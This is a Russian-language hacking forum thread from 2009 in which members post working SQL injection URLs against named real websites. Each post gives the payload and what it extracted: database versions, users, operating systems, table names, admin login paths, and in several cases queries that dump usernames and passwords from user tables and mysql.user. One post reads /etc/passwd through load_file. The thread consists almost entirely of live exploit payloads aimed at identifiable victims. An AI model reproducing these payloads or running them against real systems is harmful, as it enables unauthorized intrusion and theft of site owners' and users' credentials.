SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.daily-rent.ro/details.php?lang=en&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11/*



    Database Version: 5.0.24a
    Database name: daily_rent
    User name: mihai-mir@localhost
    Os: slackware-linux-gnu
     
    7 people like this.
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    _http://www.fcdenderdetime.be/news.php?id=-4+union+select+1,2,version(),4,5--

    5.0.32-Debian_7etch11-log

    Code:
    http://www.netfestival.be/pages/news.php?id=-7+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    netfestinetfst:[email protected]:4.0.25-standard-log

    Code:
    http://www.abyssplongee.be/news.php?cid=26&id=-16+union+select+1,unhex(hex(group_concat(table_name+separator+0x0b))),3,4+from+information_schema.tables--
    _http://www.hotel-ste-cecile.be/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8--
     
    #11122 547, 9 Nov 2009
    Last edited: 9 Nov 2009
    2 people like this.
  3. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x6f696c5f7573657273
    MySQL 5.0.26-log
    oil_users::
    id:name:,pass:type:session

    http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass,type,session),6,7+from+oil_users
    выводит все строки сразу
     
    #11123 Bb0y, 9 Nov 2009
    Last edited: 9 Nov 2009
    2 people like this.
  4. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    99px.ru - мир аватарок))) TC=20
    http://99px.ru/avatar/?pid=13031/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13/*

    version - 4.1.22
    database - px99ru
    user - px99ru@localhost
    os - portbld-freebsd6.3
     
    1 person likes this.
  5. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e
    admin::id:fullname:username:,password:level:useremail
    MySQL 5.0.75
    http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,username,0x3a,password,0x3a,useremail,0x3a,level),3,4+from+admin
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://www.rohouse.com/details.php?id=964+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+LIMIT+1,1--



    Database Version: 5.0.77-log
    Database name: rohouse_com
    User name: pinatubo@localhost
    Os: redhat-linux-gnu
     
    2 people like this.
  7. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    разработки и дизайн сайтов - ТС=20

    Blind SQL -
    Code:
    http://rireg.net/index.php?page=procjects&show=35/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)
    version - 5.0.45
     
    2 people like this.
  8. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    Решил вспомнить, как это делается..
    я хз, как там пароли зашифрованы.

    UPD, офигеть, пол-второго ночи..
     
    #11128 mr.The, 10 Nov 2009
    Last edited: 10 Nov 2009
  9. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Code:
    http://skytexalliance.com/index.php?id=15&p=1&tid=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())
    
    4.0.27-max-log:db171625947:[email protected]
    Code:
    http://www.ac-psych.org/index.php?id=1+union+select+concat_ws(0x3a,version(),database(),user())
    
    5.0.33-log:acpsych_ac-psych:[email protected]
    Code:
    http://www.imperian.com/players.php?search=deathlog&day=1+and+(substring(version(),1,1))=4
    
    version() - 4.1.20-log
     
    1 person likes this.
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://mat.fobo.ru/show.php?show=-1234'+union+select+1,concat_ws(0x3a,user(),database(),version(),@@basedir)+--+
    User:fobomat@localhost
    Database:fobomat
    Version: 5.0.51a-19-log
    BaseDir: /usr/
     
    1 person likes this.
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Versiya: 5.0.67-log

    User: [email protected]

    Database: adminclt_testsite

    OS: unknown-freebsd6.2



    Admin table: Admin_User

     
    1 person likes this.
  12. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    5.0.81-community-log : jocurius_garrone@localhost
    http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user())--

    5.0.18 : root@localhost : localhost : root : Y
    http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4,5,6,7,8,9+from+mysql.user--
    http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9
     
    2 people like this.
  13. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,column_name),3,4+from+information_schema.columns+where+table_name=0x427573546f7055736572
    BusTopUser::ID:UserName:UserPass
    http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,ID,0x3a,UserName,0x3a,UserPass),3,4+from+BusTopUser
    MySQL 5.0.45
    admin panel: http://www.let-online.co.uk/admin/login.php
    вывод ошибок отключен
     
    1 person likes this.
  14. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Coldplay.com pr7
    Официальный сайт поп/рок группы coldplay.
    Code:
    [COLOR=SlateGray]http://www.coldplay.com/newsdetail.php?id=547'+union+select+null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null+--+[/COLOR]
    version | user | database | os
    4.1.22-log | [email protected] | coldplay | redhat-linux-gnu
     
    4 people like this.
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    дуду еду
    load_file ;-)
     
    4 people like this.
  16. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,version()),0,0,0,0+from+idesk_user--
    version - 5.0.51a-24+lenny2
    database - web5@localhost
    user - usr_web5_2
    os - debian-linux-gnu

    users
    http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
     
    5 people like this.
  17. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    Code:
    http://rassvet.websib.ru/portret_sec.htm?cod=1+and+substring(version(),1,1)=4
    
    version: 4.1.20
    database: cinema
    user: shine@localhost


    Code:
    http://www.knyazev.ru/index.php?mm=7&id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--
    
    4.1.22-standard-log:balabol_knyazev:[email protected]
    Есть таблицы admins, clients


    Code:
    http://www.tutpricol.ru/message.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--
    
    4.1.25-log:tutpric5_tutpricol:tutpric5_root@localhost
    есть таблица users
     
    1 person likes this.
  18. maestra_toys

    maestra_toys Banned

    Joined:
    8 Nov 2009
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
    opendag@localhost:wwwopendagru:4.1.25-log


    Code:
    http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6%20--
    root@localhost:eek:vd:5.0.27

    Code:
    http://www.patrulrinpoche.ru/news.php?id=-72+union+select+concat_ws(0x3a,user(),database(),version())
    patrul_ru@localhost:patrul_ru:5.0.27-community-nt

    Code:
    http://www.caen.it/nuclear/news.php?id=-160+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9%20--
    mynews@localhost:CaenNews:5.0.77

    Code:
    http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4%20--
    phenomenta@localhost:phenomenta_sql:4.1.22
     
    2 people like this.
  19. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.erf-nimes.org/page_1.php?ID=-101+and+1=0+union+select+1,2,concat(nomutilisateur,0x3a,motpasse),4+from+utilisateur--
    Code:
    http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(0x3a,userUserName,userPassword,userID),3,4,5,6,7,8,9,10+from+users--
    Code:
    http://www.exhaus.de/index.php?siteID=2499+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8--
    Code:
    http://www.eamesoffice.com/vintage/spotting_detail.php?id=-92+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28username,0x3a,userpasswo 
    rd%29,10,11,12,13+from+users-- 
    
    Code:
    http://www.tasfrance.com/view_newsletter.php?id=-12+and+1=0+union+select+1,2,3,4,5,6,concat(clinum,0x3a,password),8+from+password--
     
    2 people like this.
  20. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    portacafe.ru

    Blind SQL -
    Code:
    http://portacafe.ru/index.html?id=1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)j)k)l)/**/AND/**/1=1
    version - 5.0.51a-24+lenny2-log
     
Thread Status:
Not open for further replies.